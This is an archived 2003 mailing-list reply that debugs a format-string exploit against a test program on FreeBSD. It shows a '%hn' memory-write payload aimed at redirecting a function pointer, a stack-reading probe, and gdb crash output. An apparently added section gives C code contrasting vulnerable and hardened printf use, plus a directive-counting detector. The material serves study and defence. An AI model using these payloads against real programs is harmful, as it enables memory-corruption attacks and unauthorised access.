
Re: Formatstrings on *BSD

From: Ingram <Vail(at)gmx.net>
Date: Fri Jun 20 2003 - 04:07:26 EDT


>>[%.-16457x%8$hn%.15261x%9$hn] (35)
>^---- first question is your input still at %8$x and %9$x on the bsd box?

yep, see here:

> uname
FreeBSD
> ./vuln AAAABBBB%x%x%x%x%x%x%x%x%x
0 0xbfbffccc
1 0xbfbffcd3
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0

before : ptrf() = 0x8048770 (0xbfbffad8) buffer =
[AAAABBBB2805f00022806dfe4105b6cc2805f100bfbffb1480487704141414142424242] (71) after : ptrf() = 0x8048770 (0xbfbffad8)
Welcome in "helloWorld"

>>...
>>Segmentation fault (core dumped)
>>

>^---- second ... what does the bt look like in gdb...

here we go, the fmt seems to corrupt eax

> gdb -core vuln.core
GNU gdb 4.18

.
.
.

This GDB was configured as "i386-unknown-freebsd".
Core was generated by `vuln'.
Program terminated with signal 11, Segmentation fault.
#0  0x40517d31 in ?? ()
(gdb) bt
#0  0x40517d31 in ?? ()
#1  0x8048805 in ?? ()
#2  0x8048767 in ?? ()
#3  0x8048561 in ?? ()
(gdb) i reg
eax            0x40517d31       1079082289
ecx            0x8049a70        134519408
edx            0x280e9968       672045416
ebx            0x280e8424       672039972
esp            0xbfbffad4       0xbfbffad4
ebp            0xbfbffae0       0xbfbffae0
esi            0x1      1
edi            0x280e9960       672045408
eip            0x40517d31       0x40517d31
eflags         0x10216  66070
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x2f     47
(gdb) x/1x $eax
0x40517d31:     Cannot access memory at address 0x40517d31.

kind regards
Ingram

Received on Sat Jun 21 14:24:03 2003
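The crash above comes from user data being used as the printf format string, which is what lets `%x` walk the stack and `%hn` write to it. As an added illustration (not the `vuln` program from the thread, whose source is not shown here), the vulnerable pattern beside its hardened form, plus a small input check a defender can use to flag untrusted strings that carry conversion directives; the sample strings are taken from the thread, and `echo_vulnerable` is only ever called with a well-defined input (`%%`) so the demonstration itself does not trigger undefined behaviour.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern (the shape of the thread's ./vuln): user data IS the
 * format string, so %x reads stack words and %n / %hn write to memory.
 * Compilers flag this with -Wformat-security; the pragma only silences the
 * warning so the demonstration compiles, never do that in real code. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
static int echo_vulnerable(const char *user, char *out, size_t n)
{
    return snprintf(out, n, user);
}
#pragma GCC diagnostic pop

/* Hardened pattern: user data is an argument, the format is a literal. */
static int echo_hardened(const char *user, char *out, size_t n)
{
    return snprintf(out, n, "%s", user);
}

/* Detection helper (hypothetical, not from the thread): count conversion
 * directives in a field that should be plain text. "%%" is a literal
 * percent and is not counted. A non-zero result is worth logging. */
static int count_directives(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s == '%') {
            if (s[1] == '%') { s++; continue; }
            count++;
        }
    }
    return count;
}

int main(void)
{
    char out[64];
    /* "100%%" is interpreted by the vulnerable form ("100%") but passed
     * through verbatim by the hardened form ("100%%"). */
    echo_vulnerable("100%%", out, sizeof out);
    printf("vulnerable: %s\n", out);
    echo_hardened("100%%", out, sizeof out);
    printf("hardened:   %s\n", out);
    /* The two payloads seen in the thread, as constructed samples. */
    printf("directives: %d\n", count_directives("[%.-16457x%8$hn%.15261x%9$hn]"));
    printf("directives: %d\n", count_directives("AAAABBBB%x%x%x%x%x%x%x%x%x"));
    return 0;
}
```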

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:40 EDT

